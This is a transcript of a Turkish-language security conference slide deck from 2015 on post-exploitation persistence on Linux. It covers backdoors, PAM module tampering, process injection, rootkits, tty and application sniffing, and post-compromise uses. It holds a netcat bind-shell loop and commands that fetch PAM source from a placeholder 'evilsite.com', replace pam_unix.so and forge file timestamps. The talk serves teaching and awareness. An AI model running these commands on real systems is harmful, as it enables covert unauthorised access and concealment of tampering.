Persistence For Fun and Profit

Transcript

1. persistence for fun and profit Halit Alptekin ( [email protected] )

   7 Eylül 2015 Hacktrick

2. $ whoami EDUC Bilgisayar mühendisliği WORK Siber güvenlik, PRODAFT IDEA

   Özgür yazılım ve açık kaynak tutkunu MEMB TMD, LKD, Octosec LIFE GO, matematik, kriptoloji HOBB A sınıfı amatör telsizci, elektronik, robotik 1

3. backdoors

4. simple ∙ Akla gelen ilk ve en kolay yol ∙

   Çok fazla alternatifi var ∙ Tespiti ve korunma yolları basit ∙ while true; do nc -vv -l -p 4444 -e /bin/bash; done 3

5. pam backdoor ∙ Çalışan bir process yok ∙ Dinlenen bir

   port yok ∙ Gerçek kullanıcının parolası değiştirilmiyor ∙ Dosya tabanlı önlem yoksa anlaşılması çok zor 4

6. pam backdoor - 2 wget ftp://evilsite.com/Linux-PAM-1.1.1.tar.gz tar -zxvf Linux-PAM-1.1.1.tar.gz vim

   modules/pam_unix/pam_unix_auth.c 5

7. pam backdoor - 3 ./configure && make /bin/cp -rf pam_unix.so

   /lib/security/pam_unix.so stat -c ’%z’ /lib/security/pam_ftp.so touch -d ’2015-06-08 14:49:01.856669712 +0300’ \ /lib/security/pam_unix.so rm -rf Linux-PAM.1.1.1 6

8. the ken thompson hack ∙ İlk defa ”Reflections On Trusting

   Trust” konuşmasında paylaşıldı ∙ Derleyicinin login fonksiyonlarını gördüğünde içerisine backdoor yerleşmesine dayanıyor ∙ Çeşitli geliştirilmeleri mevcut, örneğin bu işlemi derleyicinin kendini derleme aşamasına taşıma ∙ Gerçek hayatta kullanan kişi sayısı çok az 7

9. process infection

10. pre-compile ∙ Uygulamaları modifiye edip tekrar derleme en basit tekniklerden

    birisi ∙ LD_PRELOAD ile kütüphane bağlama tekniği de sıkça kullanılmakta ∙ Her zaman kaynak kod’a erişim olmaması en zayıf noktası 9

11. direct code injection ∙ Çalışan uygulamalara zarar vermeden zararlı kodun

    eklenmesi ile gerçekleşir ∙ Uygulama içerisinde yer alan şifreleri toplamak veya backdoor bırakmak için kullanılabilir ∙ Tespiti çok zordur çünkü yeni bir uygulama çalıştırılmamıştır ∙ Sunucunun resetlenmesi ile kaybolur 10

12. direct code injection 2 11

13. direct code injection 3 12

14. direct code injection 4 ∙ Hedef uygulamaya attach olunup, durdurulur

    ∙ Zararlı kod eklenir ve deattach olunup, yeniden çalıştırılır ∙ Shellcode eklemek yerine .SO dosyası yüklemesi daha kolay bir tercih 13

15. direct code injection 5 14

16. rootkits

17. user-land ∙ Yazılması ve kullanımı kolay ∙ Daha fazla işlevselliğe

    sahip ∙ Tespiti de kullanımı kadar kolay ∙ Yetkisiz kullanıcılar ile de çalıştırılabilir ∙ Post-persistence aşamasında kolaylık sağlıyor 16

18. kernal-land ∙ Kernel sürümüne bağımlı ∙ Yazılması ve kullanımı zor,

    çok fazla bağımlılık var ∙ Post-persistence aşamasında zorluk çıkartabiliyor ∙ Yakalanması çok zor 17

19. kernel-land rootkits 18

20. sniffing

21. tty hijacking ∙ Sistem çağrılarının değiştirilmesi ile gerçekleştirilir ∙ READ

    ve WRITE çağrılarının kaydedilmesi yeterlidir ∙ Malware yazarlarının sıkça kullandığı bir tekniktir ∙ Uygulama katmanında da strace uygulaması ile benzer amaca ulaşılabilir 20

22. tty hijacking 2 21

23. tty hijacking 3 22

24. application sniffing ∙ Amaç şifreleri plain-text olarak almaktır ∙ Güzel

    kurgulanırsa çok uzun süreler saklanabilir ∙ Saldırgan çalışan sisteme uygun yapıyı anlık olarak tasarlar ve uygular ∙ Şifreler uygulamanın ana parçası olan dosyaya html yorum satırları olarak eklenebilir ∙ İlgili dosyaya bir kez eriştikten sonra şifrelerin sıfırlanması da çok kullanılan bir tekniktir 23

25. application sniffing 2 24

26. application sniffing 3 25

27. post-persistence

28. amaçlar ∙ Socks, HTTP proxy, proxy chaining, SSH ∙ DoS,

    DDoS ∙ Bitcoin mining ∙ Hash cracking, distributing hash cracking ∙ Brute force, distributing brute force 27

29. Sorular? 28

30. referanslar ∙ Phrack 50/5, 58/4, 59/8, 68/9 ∙ http://vxheavens.com/lib/vrn00.html ∙

    http://c2.com/cgi/wiki?TheKenThompsonHack ∙ http://programmers.stackexchange.com/questions/184874/is- ken-thompsons-compiler-hack-still-a-threat ∙ 0daysecurity, Backdoor Pam Unix ∙ https://packetstormsecurity.com ∙ https://www.sans.org/reading-room/whitepapers/linux/linux- rootkits-beginners-prevention-removal-901 29